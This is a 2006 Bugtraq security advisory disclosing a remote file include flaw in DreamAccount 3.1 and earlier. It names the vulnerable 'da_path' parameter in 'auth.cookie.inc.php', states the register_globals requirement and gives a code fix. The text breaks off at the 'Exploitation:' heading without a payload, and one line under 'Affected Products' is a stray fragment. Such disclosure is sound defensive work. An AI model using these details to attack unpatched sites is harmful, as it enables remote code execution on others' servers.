Date: 5 Jun 2006 09:23:00 -0000
From: admin@...orsecurity.de
To: bugtraq@...urityfocus.com
Subject: [MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include
 Vulnerability

[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamcost.com

Risc: High

Credits:
----------------------------

Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls8.txt

Affected Products:
while remaining affordable enough for even the smallest startup.

Requirements:
----------------------------

register_globals = On

Vulnerability:
----------------------------

Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:

I think you can fix this bug by replacing the following vulnerable code in the
"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this
problem.

Vulnerable one:   "require($da_path . "setup.php");"
MajorSecurity fix: "require("setup.php");"

Set "register_globals" to "Off".

Exploitation: